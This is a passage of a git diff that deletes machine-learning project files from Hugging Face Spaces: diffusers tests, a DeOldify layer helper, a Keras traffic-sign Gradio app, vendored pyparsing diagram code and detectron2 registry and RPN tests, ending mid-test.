self._test_xformers_attention_forwardGenerator_pass(expected_max_diff=1e-3) - - def test_save_load_optional_components(self): - self._test_save_load_optional_components() - - @unittest.skipIf(torch_device != "cuda", reason="float16 requires CUDA") - def test_save_load_float16(self): - # Due to non-determinism in save load of the hf-internal-testing/tiny-random-t5 text encoder - super().test_save_load_float16(expected_max_diff=1e-1) - - def test_attention_slicing_forward_pass(self): - self._test_attention_slicing_forward_pass(expected_max_diff=1e-2) - - def test_save_load_local(self): - self._test_save_load_local() - - def test_inference_batch_single_identical(self): - self._test_inference_batch_single_identical( - expected_max_diff=1e-2, - ) diff --git a/spaces/ArchitSharma/Digital-Photo-Color-Restoration/src/deoldify/layers.py b/spaces/ArchitSharma/Digital-Photo-Color-Restoration/src/deoldify/layers.py deleted file mode 100644 index b7533c90888a66b14361666ec5ae6b5d05a9eb8f..0000000000000000000000000000000000000000 --- a/spaces/ArchitSharma/Digital-Photo-Color-Restoration/src/deoldify/layers.py +++ /dev/null @@ -1,48 +0,0 @@ -from fastai.layers import * -from fastai.torch_core import * -from torch.nn.parameter import Parameter -from torch.autograd import Variable - - -# The code below is meant to be merged into fastaiv1 ideally - - -def custom_conv_layer( - ni: int, - nf: int, - ks: int = 3, - stride: int = 1, - padding: int = None, - bias: bool = None, - is_1d: bool = False, - norm_type: Optional[NormType] = NormType.Batch, - use_activ: bool = True, - leaky: float = None, - transpose: bool = False, - init: Callable = nn.init.kaiming_normal_, - self_attention: bool = False, - extra_bn: bool = False, -): - "Create a sequence of convolutional (`ni` to `nf`), ReLU (if `use_activ`) and batchnorm (if `bn`) layers." 
- if padding is None: - padding = (ks - 1) // 2 if not transpose else 0 - bn = norm_type in (NormType.Batch, NormType.BatchZero) or extra_bn == True - if bias is None: - bias = not bn - conv_func = nn.ConvTranspose2d if transpose else nn.Conv1d if is_1d else nn.Conv2d - conv = init_default( - conv_func(ni, nf, kernel_size=ks, bias=bias, stride=stride, padding=padding), - init, - ) - if norm_type == NormType.Weight: - conv = weight_norm(conv) - elif norm_type == NormType.Spectral: - conv = spectral_norm(conv) - layers = [conv] - if use_activ: - layers.append(relu(True, leaky=leaky)) - if bn: - layers.append((nn.BatchNorm1d if is_1d else nn.BatchNorm2d)(nf)) - if self_attention: - layers.append(SelfAttention(nf)) - return nn.Sequential(*layers) diff --git a/spaces/Aristo/trafficsign/app.py b/spaces/Aristo/trafficsign/app.py deleted file mode 100644 index 8bceb18cd893ce3bb4e8faa49ae50b081c78fbbc..0000000000000000000000000000000000000000 --- a/spaces/Aristo/trafficsign/app.py +++ /dev/null @@ -1,39 +0,0 @@ -import gradio as gr -import PIL -import numpy -import matplotlib.pyplot as plt -#load the trained model to classify sign -from keras.models import load_model -model = load_model('traffic_classifier.h5') -#dictionary to label all traffic signs class. 
-classes = { 1:'Speed limit (20km/h)',
-            2:'Speed limit (30km/h)',
-            3:'Speed limit (50km/h)',
-            4:'Speed limit (60km/h)',
-            5:'Speed limit (70km/h)',
-            6:'Speed limit (80km/h)',
-            7:'End of speed limit (80km/h)',
-            8:'Speed limit (100km/h)',
-            9:'Speed limit (120km/h)',
-            10:'Veh > 3.5 tons prohibited',
-            11:'Bumpy road',
-            12:'Slippery road',
-            13:'Road narrows on the right',
-            14:'Road work',
-            15:'Pedestrians',
-            16:'Turn right ahead',
-            17:'Turn left ahead',
-            18:'Ahead only',
-            19:'Go straight or right',
-            20:'Go straight or left',
-            21:'Keep right',
-            22:'Keep left',
-            23:'Roundabout mandatory'}
-#initialise GUI
-def predict(img):
-    img = numpy.expand_dims(img, axis=0)
-    predict_x = model.predict(img)
-    pred = numpy.argmax(predict_x, axis = 1)
-    sign = classes[pred[0]+1]
-    return sign
-gr.Interface(fn= predict, inputs = gr.inputs.Image(shape = (30,30)), outputs= "textbox" ).launch(share=True, debug = True)
\ No newline at end of file
diff --git a/spaces/Ataturk-Chatbot/HuggingFaceChat/venv/lib/python3.11/site-packages/pkg_resources/_vendor/pyparsing/diagram/__init__.py b/spaces/Ataturk-Chatbot/HuggingFaceChat/venv/lib/python3.11/site-packages/pkg_resources/_vendor/pyparsing/diagram/__init__.py
deleted file mode 100644
index 898644755cbbf9a8d4df562663114a7eb7e11fd1..0000000000000000000000000000000000000000
--- a/spaces/Ataturk-Chatbot/HuggingFaceChat/venv/lib/python3.11/site-packages/pkg_resources/_vendor/pyparsing/diagram/__init__.py
+++ /dev/null
@@ -1,642 +0,0 @@
-import railroad
-import pyparsing
-import typing
-from typing import (
-    List,
-    NamedTuple,
-    Generic,
-    TypeVar,
-    Dict,
-    Callable,
-    Set,
-    Iterable,
-)
-from jinja2 import Template
-from io import StringIO
-import inspect
-
-
-jinja2_template_source = """\
-<!DOCTYPE html>
-<html>
-<head>
-    {% if not head %}
-        <style>
-            .railroad-heading {
-                font-family: monospace;
-            }
-        </style>
-    {% else %}
-        {{ head | safe }}
-    {% endif %}
-</head>
-<body>
-{{ body | safe }}
-{% for diagram in diagrams %}
-
-    <div class="railroad-group">
-        <h1 class="railroad-heading">
-            {{ diagram.title }}
-        </h1>
-        <div class="railroad-description">
-            {{ diagram.text }}
-        </div>
-        <div class="railroad-svg">
-            {{ diagram.svg }}
-        </div>
-    </div>
-{% endfor %}
-</body>
-</html>
-"""
-
-template = Template(jinja2_template_source)
-
-# Note: ideally this would be a dataclass, but we're supporting Python 3.5+ so we can't do this yet
-NamedDiagram = NamedTuple(
-    "NamedDiagram",
-    [("name", str), ("diagram", typing.Optional[railroad.DiagramItem]), ("index", int)],
-)
-"""
-A simple structure for associating a name with a railroad diagram
-"""
-
-T = TypeVar("T")
-
-
-class EachItem(railroad.Group):
-    """
-    Custom railroad item to compose a:
-    - Group containing a
-      - OneOrMore containing a
-        - Choice of the elements in the Each
-    with the group label indicating that all must be matched
-    """
-
-    all_label = "[ALL]"
-
-    def __init__(self, *items):
-        choice_item = railroad.Choice(len(items) - 1, *items)
-        one_or_more_item = railroad.OneOrMore(item=choice_item)
-        super().__init__(one_or_more_item, label=self.all_label)
-
-
-class AnnotatedItem(railroad.Group):
-    """
-    Simple subclass of Group that creates an annotation label
-    """
-
-    def __init__(self, label: str, item):
-        super().__init__(item=item, label="[{}]".format(label) if label else label)
-
-
-class EditablePartial(Generic[T]):
-    """
-    Acts like a functools.partial, but can be edited. In other words, it represents a type that hasn't yet been
-    constructed.
-    """
-
-    # We need this here because the railroad constructors actually transform the data, so can't be called until the
-    # entire tree is assembled
-
-    def __init__(self, func: Callable[..., T], args: list, kwargs: dict):
-        self.func = func
-        self.args = args
-        self.kwargs = kwargs
-
-    @classmethod
-    def from_call(cls, func: Callable[..., T], *args, **kwargs) -> "EditablePartial[T]":
-        """
-        If you call this function in the same way that you would call the constructor, it will store the arguments
-        as you expect.
For example EditablePartial.from_call(Fraction, 1, 3)() == Fraction(1, 3) - """ - return EditablePartial(func=func, args=list(args), kwargs=kwargs) - - @property - def name(self): - return self.kwargs["name"] - - def __call__(self) -> T: - """ - Evaluate the partial and return the result - """ - args = self.args.copy() - kwargs = self.kwargs.copy() - - # This is a helpful hack to allow you to specify varargs parameters (e.g. *args) as keyword args (e.g. - # args=['list', 'of', 'things']) - arg_spec = inspect.getfullargspec(self.func) - if arg_spec.varargs in self.kwargs: - args += kwargs.pop(arg_spec.varargs) - - return self.func(*args, **kwargs) - - -def railroad_to_html(diagrams: List[NamedDiagram], **kwargs) -> str: - """ - Given a list of NamedDiagram, produce a single HTML string that visualises those diagrams - :params kwargs: kwargs to be passed in to the template - """ - data = [] - for diagram in diagrams: - if diagram.diagram is None: - continue - io = StringIO() - diagram.diagram.writeSvg(io.write) - title = diagram.name - if diagram.index == 0: - title += " (root)" - data.append({"title": title, "text": "", "svg": io.getvalue()}) - - return template.render(diagrams=data, **kwargs) - - -def resolve_partial(partial: "EditablePartial[T]") -> T: - """ - Recursively resolves a collection of Partials into whatever type they are - """ - if isinstance(partial, EditablePartial): - partial.args = resolve_partial(partial.args) - partial.kwargs = resolve_partial(partial.kwargs) - return partial() - elif isinstance(partial, list): - return [resolve_partial(x) for x in partial] - elif isinstance(partial, dict): - return {key: resolve_partial(x) for key, x in partial.items()} - else: - return partial - - -def to_railroad( - element: pyparsing.ParserElement, - diagram_kwargs: typing.Optional[dict] = None, - vertical: int = 3, - show_results_names: bool = False, - show_groups: bool = False, -) -> List[NamedDiagram]: - """ - Convert a pyparsing element tree into a list 
of diagrams. This is the recommended entrypoint to diagram - creation if you want to access the Railroad tree before it is converted to HTML - :param element: base element of the parser being diagrammed - :param diagram_kwargs: kwargs to pass to the Diagram() constructor - :param vertical: (optional) - int - limit at which number of alternatives should be - shown vertically instead of horizontally - :param show_results_names - bool to indicate whether results name annotations should be - included in the diagram - :param show_groups - bool to indicate whether groups should be highlighted with an unlabeled - surrounding box - """ - # Convert the whole tree underneath the root - lookup = ConverterState(diagram_kwargs=diagram_kwargs or {}) - _to_diagram_element( - element, - lookup=lookup, - parent=None, - vertical=vertical, - show_results_names=show_results_names, - show_groups=show_groups, - ) - - root_id = id(element) - # Convert the root if it hasn't been already - if root_id in lookup: - if not element.customName: - lookup[root_id].name = "" - lookup[root_id].mark_for_extraction(root_id, lookup, force=True) - - # Now that we're finished, we can convert from intermediate structures into Railroad elements - diags = list(lookup.diagrams.values()) - if len(diags) > 1: - # collapse out duplicate diags with the same name - seen = set() - deduped_diags = [] - for d in diags: - # don't extract SkipTo elements, they are uninformative as subdiagrams - if d.name == "...": - continue - if d.name is not None and d.name not in seen: - seen.add(d.name) - deduped_diags.append(d) - resolved = [resolve_partial(partial) for partial in deduped_diags] - else: - # special case - if just one diagram, always display it, even if - # it has no name - resolved = [resolve_partial(partial) for partial in diags] - return sorted(resolved, key=lambda diag: diag.index) - - -def _should_vertical( - specification: int, exprs: Iterable[pyparsing.ParserElement] -) -> bool: - """ - Returns true if we 
should return a vertical list of elements - """ - if specification is None: - return False - else: - return len(_visible_exprs(exprs)) >= specification - - -class ElementState: - """ - State recorded for an individual pyparsing Element - """ - - # Note: this should be a dataclass, but we have to support Python 3.5 - def __init__( - self, - element: pyparsing.ParserElement, - converted: EditablePartial, - parent: EditablePartial, - number: int, - name: str = None, - parent_index: typing.Optional[int] = None, - ): - #: The pyparsing element that this represents - self.element: pyparsing.ParserElement = element - #: The name of the element - self.name: typing.Optional[str] = name - #: The output Railroad element in an unconverted state - self.converted: EditablePartial = converted - #: The parent Railroad element, which we store so that we can extract this if it's duplicated - self.parent: EditablePartial = parent - #: The order in which we found this element, used for sorting diagrams if this is extracted into a diagram - self.number: int = number - #: The index of this inside its parent - self.parent_index: typing.Optional[int] = parent_index - #: If true, we should extract this out into a subdiagram - self.extract: bool = False - #: If true, all of this element's children have been filled out - self.complete: bool = False - - def mark_for_extraction( - self, el_id: int, state: "ConverterState", name: str = None, force: bool = False - ): - """ - Called when this instance has been seen twice, and thus should eventually be extracted into a sub-diagram - :param el_id: id of the element - :param state: element/diagram state tracker - :param name: name to use for this element's text - :param force: If true, force extraction now, regardless of the state of this. 
Only useful for extracting the - root element when we know we're finished - """ - self.extract = True - - # Set the name - if not self.name: - if name: - # Allow forcing a custom name - self.name = name - elif self.element.customName: - self.name = self.element.customName - else: - self.name = "" - - # Just because this is marked for extraction doesn't mean we can do it yet. We may have to wait for children - # to be added - # Also, if this is just a string literal etc, don't bother extracting it - if force or (self.complete and _worth_extracting(self.element)): - state.extract_into_diagram(el_id) - - -class ConverterState: - """ - Stores some state that persists between recursions into the element tree - """ - - def __init__(self, diagram_kwargs: typing.Optional[dict] = None): - #: A dictionary mapping ParserElements to state relating to them - self._element_diagram_states: Dict[int, ElementState] = {} - #: A dictionary mapping ParserElement IDs to subdiagrams generated from them - self.diagrams: Dict[int, EditablePartial[NamedDiagram]] = {} - #: The index of the next unnamed element - self.unnamed_index: int = 1 - #: The index of the next element. 
This is used for sorting - self.index: int = 0 - #: Shared kwargs that are used to customize the construction of diagrams - self.diagram_kwargs: dict = diagram_kwargs or {} - self.extracted_diagram_names: Set[str] = set() - - def __setitem__(self, key: int, value: ElementState): - self._element_diagram_states[key] = value - - def __getitem__(self, key: int) -> ElementState: - return self._element_diagram_states[key] - - def __delitem__(self, key: int): - del self._element_diagram_states[key] - - def __contains__(self, key: int): - return key in self._element_diagram_states - - def generate_unnamed(self) -> int: - """ - Generate a number used in the name of an otherwise unnamed diagram - """ - self.unnamed_index += 1 - return self.unnamed_index - - def generate_index(self) -> int: - """ - Generate a number used to index a diagram - """ - self.index += 1 - return self.index - - def extract_into_diagram(self, el_id: int): - """ - Used when we encounter the same token twice in the same tree. 
When this - happens, we replace all instances of that token with a terminal, and - create a new subdiagram for the token - """ - position = self[el_id] - - # Replace the original definition of this element with a regular block - if position.parent: - ret = EditablePartial.from_call(railroad.NonTerminal, text=position.name) - if "item" in position.parent.kwargs: - position.parent.kwargs["item"] = ret - elif "items" in position.parent.kwargs: - position.parent.kwargs["items"][position.parent_index] = ret - - # If the element we're extracting is a group, skip to its content but keep the title - if position.converted.func == railroad.Group: - content = position.converted.kwargs["item"] - else: - content = position.converted - - self.diagrams[el_id] = EditablePartial.from_call( - NamedDiagram, - name=position.name, - diagram=EditablePartial.from_call( - railroad.Diagram, content, **self.diagram_kwargs - ), - index=position.number, - ) - - del self[el_id] - - -def _worth_extracting(element: pyparsing.ParserElement) -> bool: - """ - Returns true if this element is worth having its own sub-diagram. 
Simply, if any of its children - themselves have children, then its complex enough to extract - """ - children = element.recurse() - return any(child.recurse() for child in children) - - -def _apply_diagram_item_enhancements(fn): - """ - decorator to ensure enhancements to a diagram item (such as results name annotations) - get applied on return from _to_diagram_element (we do this since there are several - returns in _to_diagram_element) - """ - - def _inner( - element: pyparsing.ParserElement, - parent: typing.Optional[EditablePartial], - lookup: ConverterState = None, - vertical: int = None, - index: int = 0, - name_hint: str = None, - show_results_names: bool = False, - show_groups: bool = False, - ) -> typing.Optional[EditablePartial]: - - ret = fn( - element, - parent, - lookup, - vertical, - index, - name_hint, - show_results_names, - show_groups, - ) - - # apply annotation for results name, if present - if show_results_names and ret is not None: - element_results_name = element.resultsName - if element_results_name: - # add "*" to indicate if this is a "list all results" name - element_results_name += "" if element.modalResults else "*" - ret = EditablePartial.from_call( - railroad.Group, item=ret, label=element_results_name - ) - - return ret - - return _inner - - -def _visible_exprs(exprs: Iterable[pyparsing.ParserElement]): - non_diagramming_exprs = ( - pyparsing.ParseElementEnhance, - pyparsing.PositionToken, - pyparsing.And._ErrorStop, - ) - return [ - e - for e in exprs - if not (e.customName or e.resultsName or isinstance(e, non_diagramming_exprs)) - ] - - -@_apply_diagram_item_enhancements -def _to_diagram_element( - element: pyparsing.ParserElement, - parent: typing.Optional[EditablePartial], - lookup: ConverterState = None, - vertical: int = None, - index: int = 0, - name_hint: str = None, - show_results_names: bool = False, - show_groups: bool = False, -) -> typing.Optional[EditablePartial]: - """ - Recursively converts a PyParsing Element to a 
railroad Element - :param lookup: The shared converter state that keeps track of useful things - :param index: The index of this element within the parent - :param parent: The parent of this element in the output tree - :param vertical: Controls at what point we make a list of elements vertical. If this is an integer (the default), - it sets the threshold of the number of items before we go vertical. If True, always go vertical, if False, never - do so - :param name_hint: If provided, this will override the generated name - :param show_results_names: bool flag indicating whether to add annotations for results names - :returns: The converted version of the input element, but as a Partial that hasn't yet been constructed - :param show_groups: bool flag indicating whether to show groups using bounding box - """ - exprs = element.recurse() - name = name_hint or element.customName or element.__class__.__name__ - - # Python's id() is used to provide a unique identifier for elements - el_id = id(element) - - element_results_name = element.resultsName - - # Here we basically bypass processing certain wrapper elements if they contribute nothing to the diagram - if not element.customName: - if isinstance( - element, - ( - # pyparsing.TokenConverter, - # pyparsing.Forward, - pyparsing.Located, - ), - ): - # However, if this element has a useful custom name, and its child does not, we can pass it on to the child - if exprs: - if not exprs[0].customName: - propagated_name = name - else: - propagated_name = None - - return _to_diagram_element( - element.expr, - parent=parent, - lookup=lookup, - vertical=vertical, - index=index, - name_hint=propagated_name, - show_results_names=show_results_names, - show_groups=show_groups, - ) - - # If the element isn't worth extracting, we always treat it as the first time we say it - if _worth_extracting(element): - if el_id in lookup: - # If we've seen this element exactly once before, we are only just now finding out that it's a duplicate, - 
# so we have to extract it into a new diagram. - looked_up = lookup[el_id] - looked_up.mark_for_extraction(el_id, lookup, name=name_hint) - ret = EditablePartial.from_call(railroad.NonTerminal, text=looked_up.name) - return ret - - elif el_id in lookup.diagrams: - # If we have seen the element at least twice before, and have already extracted it into a subdiagram, we - # just put in a marker element that refers to the sub-diagram - ret = EditablePartial.from_call( - railroad.NonTerminal, text=lookup.diagrams[el_id].kwargs["name"] - ) - return ret - - # Recursively convert child elements - # Here we find the most relevant Railroad element for matching pyparsing Element - # We use ``items=[]`` here to hold the place for where the child elements will go once created - if isinstance(element, pyparsing.And): - # detect And's created with ``expr*N`` notation - for these use a OneOrMore with a repeat - # (all will have the same name, and resultsName) - if not exprs: - return None - if len(set((e.name, e.resultsName) for e in exprs)) == 1: - ret = EditablePartial.from_call( - railroad.OneOrMore, item="", repeat=str(len(exprs)) - ) - elif _should_vertical(vertical, exprs): - ret = EditablePartial.from_call(railroad.Stack, items=[]) - else: - ret = EditablePartial.from_call(railroad.Sequence, items=[]) - elif isinstance(element, (pyparsing.Or, pyparsing.MatchFirst)): - if not exprs: - return None - if _should_vertical(vertical, exprs): - ret = EditablePartial.from_call(railroad.Choice, 0, items=[]) - else: - ret = EditablePartial.from_call(railroad.HorizontalChoice, items=[]) - elif isinstance(element, pyparsing.Each): - if not exprs: - return None - ret = EditablePartial.from_call(EachItem, items=[]) - elif isinstance(element, pyparsing.NotAny): - ret = EditablePartial.from_call(AnnotatedItem, label="NOT", item="") - elif isinstance(element, pyparsing.FollowedBy): - ret = EditablePartial.from_call(AnnotatedItem, label="LOOKAHEAD", item="") - elif isinstance(element, 
pyparsing.PrecededBy): - ret = EditablePartial.from_call(AnnotatedItem, label="LOOKBEHIND", item="") - elif isinstance(element, pyparsing.Group): - if show_groups: - ret = EditablePartial.from_call(AnnotatedItem, label="", item="") - else: - ret = EditablePartial.from_call(railroad.Group, label="", item="") - elif isinstance(element, pyparsing.TokenConverter): - ret = EditablePartial.from_call( - AnnotatedItem, label=type(element).__name__.lower(), item="" - ) - elif isinstance(element, pyparsing.Opt): - ret = EditablePartial.from_call(railroad.Optional, item="") - elif isinstance(element, pyparsing.OneOrMore): - ret = EditablePartial.from_call(railroad.OneOrMore, item="") - elif isinstance(element, pyparsing.ZeroOrMore): - ret = EditablePartial.from_call(railroad.ZeroOrMore, item="") - elif isinstance(element, pyparsing.Group): - ret = EditablePartial.from_call( - railroad.Group, item=None, label=element_results_name - ) - elif isinstance(element, pyparsing.Empty) and not element.customName: - # Skip unnamed "Empty" elements - ret = None - elif len(exprs) > 1: - ret = EditablePartial.from_call(railroad.Sequence, items=[]) - elif len(exprs) > 0 and not element_results_name: - ret = EditablePartial.from_call(railroad.Group, item="", label=name) - else: - terminal = EditablePartial.from_call(railroad.Terminal, element.defaultName) - ret = terminal - - if ret is None: - return - - # Indicate this element's position in the tree so we can extract it if necessary - lookup[el_id] = ElementState( - element=element, - converted=ret, - parent=parent, - parent_index=index, - number=lookup.generate_index(), - ) - if element.customName: - lookup[el_id].mark_for_extraction(el_id, lookup, element.customName) - - i = 0 - for expr in exprs: - # Add a placeholder index in case we have to extract the child before we even add it to the parent - if "items" in ret.kwargs: - ret.kwargs["items"].insert(i, None) - - item = _to_diagram_element( - expr, - parent=ret, - lookup=lookup, - 
vertical=vertical, - index=i, - show_results_names=show_results_names, - show_groups=show_groups, - ) - - # Some elements don't need to be shown in the diagram - if item is not None: - if "item" in ret.kwargs: - ret.kwargs["item"] = item - elif "items" in ret.kwargs: - # If we've already extracted the child, don't touch this index, since it's occupied by a nonterminal - ret.kwargs["items"][i] = item - i += 1 - elif "items" in ret.kwargs: - # If we're supposed to skip this element, remove it from the parent - del ret.kwargs["items"][i] - - # If all this items children are none, skip this item - if ret and ( - ("items" in ret.kwargs and len(ret.kwargs["items"]) == 0) - or ("item" in ret.kwargs and ret.kwargs["item"] is None) - ): - ret = EditablePartial.from_call(railroad.Terminal, name) - - # Mark this element as "complete", ie it has all of its children - if el_id in lookup: - lookup[el_id].complete = True - - if el_id in lookup and lookup[el_id].extract and lookup[el_id].complete: - lookup.extract_into_diagram(el_id) - if ret is not None: - ret = EditablePartial.from_call( - railroad.NonTerminal, text=lookup.diagrams[el_id].kwargs["name"] - ) - - return ret diff --git a/spaces/Awiny/Image2Paragraph/models/grit_src/third_party/CenterNet2/detectron2/utils/registry.py b/spaces/Awiny/Image2Paragraph/models/grit_src/third_party/CenterNet2/detectron2/utils/registry.py deleted file mode 100644 index 4b01e9007c2578a7b5ae555c926cc06c8a3010f9..0000000000000000000000000000000000000000 --- a/spaces/Awiny/Image2Paragraph/models/grit_src/third_party/CenterNet2/detectron2/utils/registry.py +++ /dev/null @@ -1,60 +0,0 @@ -# Copyright (c) Facebook, Inc. and its affiliates. - -from typing import Any -import pydoc -from fvcore.common.registry import Registry # for backward compatibility. - -""" -``Registry`` and `locate` provide ways to map a string (typically found -in config files) to callable objects. 
-""" - -__all__ = ["Registry", "locate"] - - -def _convert_target_to_string(t: Any) -> str: - """ - Inverse of ``locate()``. - - Args: - t: any object with ``__module__`` and ``__qualname__`` - """ - module, qualname = t.__module__, t.__qualname__ - - # Compress the path to this object, e.g. ``module.submodule._impl.class`` - # may become ``module.submodule.class``, if the later also resolves to the same - # object. This simplifies the string, and also is less affected by moving the - # class implementation. - module_parts = module.split(".") - for k in range(1, len(module_parts)): - prefix = ".".join(module_parts[:k]) - candidate = f"{prefix}.{qualname}" - try: - if locate(candidate) is t: - return candidate - except ImportError: - pass - return f"{module}.{qualname}" - - -def locate(name: str) -> Any: - """ - Locate and return an object ``x`` using an input string ``{x.__module__}.{x.__qualname__}``, - such as "module.submodule.class_name". - - Raise Exception if it cannot be found. - """ - obj = pydoc.locate(name) - - # Some cases (e.g. torch.optim.sgd.SGD) not handled correctly - # by pydoc.locate. Try a private function from hydra. - if obj is None: - try: - # from hydra.utils import get_method - will print many errors - from hydra.utils import _locate - except ImportError as e: - raise ImportError(f"Cannot dynamically locate object {name}!") from e - else: - obj = _locate(name) # it raises if fails - - return obj diff --git a/spaces/Awiny/Image2Paragraph/models/grit_src/third_party/CenterNet2/tests/modeling/test_rpn.py b/spaces/Awiny/Image2Paragraph/models/grit_src/third_party/CenterNet2/tests/modeling/test_rpn.py deleted file mode 100644 index f14faae56e580d3d4762d31273b9f65c5774346b..0000000000000000000000000000000000000000 --- a/spaces/Awiny/Image2Paragraph/models/grit_src/third_party/CenterNet2/tests/modeling/test_rpn.py +++ /dev/null @@ -1,262 +0,0 @@ -# Copyright (c) Facebook, Inc. and its affiliates. 
-import logging -import unittest -import torch - -from detectron2.config import get_cfg -from detectron2.export import scripting_with_instances -from detectron2.layers import ShapeSpec -from detectron2.modeling.backbone import build_backbone -from detectron2.modeling.proposal_generator import RPN, build_proposal_generator -from detectron2.modeling.proposal_generator.proposal_utils import ( - add_ground_truth_to_proposals, - find_top_rpn_proposals, -) -from detectron2.structures import Boxes, ImageList, Instances, RotatedBoxes -from detectron2.utils.events import EventStorage - -logger = logging.getLogger(__name__) - - -class RPNTest(unittest.TestCase): - def get_gt_and_features(self): - num_images = 2 - images_tensor = torch.rand(num_images, 20, 30) - image_sizes = [(10, 10), (20, 30)] - images = ImageList(images_tensor, image_sizes) - image_shape = (15, 15) - num_channels = 1024 - features = {"res4": torch.rand(num_images, num_channels, 1, 2)} - gt_boxes = torch.tensor([[1, 1, 3, 3], [2, 2, 6, 6]], dtype=torch.float32) - gt_instances = Instances(image_shape) - gt_instances.gt_boxes = Boxes(gt_boxes) - return (gt_instances, features, images, image_sizes) - - def test_rpn(self): - torch.manual_seed(121) - cfg = get_cfg() - backbone = build_backbone(cfg) - proposal_generator = RPN(cfg, backbone.output_shape()) - (gt_instances, features, images, image_sizes) = self.get_gt_and_features() - with EventStorage(): # capture events in a new storage to discard them - proposals, proposal_losses = proposal_generator( - images, features, [gt_instances[0], gt_instances[1]] - ) - - expected_losses = { - "loss_rpn_cls": torch.tensor(0.08011703193), - "loss_rpn_loc": torch.tensor(0.101470276), - } - for name in expected_losses.keys(): - err_msg = "proposal_losses[{}] = {}, expected losses = {}".format( - name, proposal_losses[name], expected_losses[name] - ) - self.assertTrue(torch.allclose(proposal_losses[name], expected_losses[name]), err_msg) - - self.assertEqual(len(proposals), 
len(image_sizes)) - for proposal, im_size in zip(proposals, image_sizes): - self.assertEqual(proposal.image_size, im_size) - - expected_proposal_box = torch.tensor([[0, 0, 10, 10], [7.2702, 0, 10, 10]]) - expected_objectness_logit = torch.tensor([0.1596, -0.0007]) - self.assertTrue( - torch.allclose(proposals[0].proposal_boxes.tensor, expected_proposal_box, atol=1e-4) - ) - self.assertTrue( - torch.allclose(proposals[0].objectness_logits, expected_objectness_logit, atol=1e-4) - ) - - def verify_rpn(self, conv_dims, expected_conv_dims): - torch.manual_seed(121) - cfg = get_cfg() - cfg.MODEL.RPN.CONV_DIMS = conv_dims - backbone = build_backbone(cfg) - proposal_generator = RPN(cfg, backbone.output_shape()) - for k, conv in enumerate(proposal_generator.rpn_head.conv): - self.assertEqual(expected_conv_dims[k], conv.out_channels) - return proposal_generator - - def test_rpn_larger_num_convs(self): - conv_dims = [64, 64, 64, 64, 64] - proposal_generator = self.verify_rpn(conv_dims, conv_dims) - (gt_instances, features, images, image_sizes) = self.get_gt_and_features() - with EventStorage(): # capture events in a new storage to discard them - proposals, proposal_losses = proposal_generator( - images, features, [gt_instances[0], gt_instances[1]] - ) - expected_losses = { - "loss_rpn_cls": torch.tensor(0.08122821152), - "loss_rpn_loc": torch.tensor(0.10064548254), - } - for name in expected_losses.keys(): - err_msg = "proposal_losses[{}] = {}, expected losses = {}".format( - name, proposal_losses[name], expected_losses[name] - ) - self.assertTrue(torch.allclose(proposal_losses[name], expected_losses[name]), err_msg) - - def test_rpn_conv_dims_not_set(self): - conv_dims = [-1, -1, -1] - expected_conv_dims = [1024, 1024, 1024] - self.verify_rpn(conv_dims, expected_conv_dims) - - def test_rpn_scriptability(self): - cfg = get_cfg() - proposal_generator = RPN(cfg, {"res4": ShapeSpec(channels=1024, stride=16)}).eval() - num_images = 2 - images_tensor = torch.rand(num_images, 30, 
40) - image_sizes = [(32, 32), (30, 40)] - images = ImageList(images_tensor, image_sizes) - features = {"res4": torch.rand(num_images, 1024, 1, 2)} - - fields = {"proposal_boxes": Boxes, "objectness_logits": torch.Tensor} - proposal_generator_ts = scripting_with_instances(proposal_generator, fields) - - proposals, _ = proposal_generator(images, features) - proposals_ts, _ = proposal_generator_ts(images, features) - - for proposal, proposal_ts in zip(proposals, proposals_ts): - self.assertEqual(proposal.image_size, proposal_ts.image_size) - self.assertTrue( - torch.equal(proposal.proposal_boxes.tensor, proposal_ts.proposal_boxes.tensor) - ) - self.assertTrue(torch.equal(proposal.objectness_logits, proposal_ts.objectness_logits)) - - def test_rrpn(self): - torch.manual_seed(121) - cfg = get_cfg() - cfg.MODEL.PROPOSAL_GENERATOR.NAME = "RRPN" - cfg.MODEL.ANCHOR_GENERATOR.NAME = "RotatedAnchorGenerator" - cfg.MODEL.ANCHOR_GENERATOR.SIZES = [[32, 64]] - cfg.MODEL.ANCHOR_GENERATOR.ASPECT_RATIOS = [[0.25, 1]] - cfg.MODEL.ANCHOR_GENERATOR.ANGLES = [[0, 60]] - cfg.MODEL.RPN.BBOX_REG_WEIGHTS = (1, 1, 1, 1, 1) - cfg.MODEL.RPN.HEAD_NAME = "StandardRPNHead" - backbone = build_backbone(cfg) - proposal_generator = build_proposal_generator(cfg, backbone.output_shape()) - num_images = 2 - images_tensor = torch.rand(num_images, 20, 30) - image_sizes = [(10, 10), (20, 30)] - images = ImageList(images_tensor, image_sizes) - image_shape = (15, 15) - num_channels = 1024 - features = {"res4": torch.rand(num_images, num_channels, 1, 2)} - gt_boxes = torch.tensor([[2, 2, 2, 2, 0], [4, 4, 4, 4, 0]], dtype=torch.float32) - gt_instances = Instances(image_shape) - gt_instances.gt_boxes = RotatedBoxes(gt_boxes) - with EventStorage(): # capture events in a new storage to discard them - proposals, proposal_losses = proposal_generator( - images, features, [gt_instances[0], gt_instances[1]] - ) - - expected_losses = { - "loss_rpn_cls": torch.tensor(0.04291602224), - "loss_rpn_loc": 
torch.tensor(0.145077362), - } - for name in expected_losses.keys(): - err_msg = "proposal_losses[{}] = {}, expected losses = {}".format( - name, proposal_losses[name], expected_losses[name] - ) - self.assertTrue(torch.allclose(proposal_losses[name], expected_losses[name]), err_msg) - - expected_proposal_box = torch.tensor( - [ - [-1.77999556, 0.78155339, 68.04367828, 14.78156471, 60.59333801], - [13.82740974, -1.50282836, 34.67269897, 29.19676590, -3.81942749], - [8.10392570, -0.99071521, 145.39100647, 32.13126373, 3.67242432], - [5.00000000, 4.57370186, 10.00000000, 9.14740372, 0.89196777], - ] - ) - - expected_objectness_logit = torch.tensor([0.10924313, 0.09881870, 0.07649877, 0.05858029]) - - torch.set_printoptions(precision=8, sci_mode=False) - - self.assertEqual(len(proposals), len(image_sizes)) - - proposal = proposals[0] - # It seems that there's some randomness in the result across different machines: - # This test can be run on a local machine for 100 times with exactly the same result, - # However, a different machine might produce slightly different results, - # thus the atol here. 
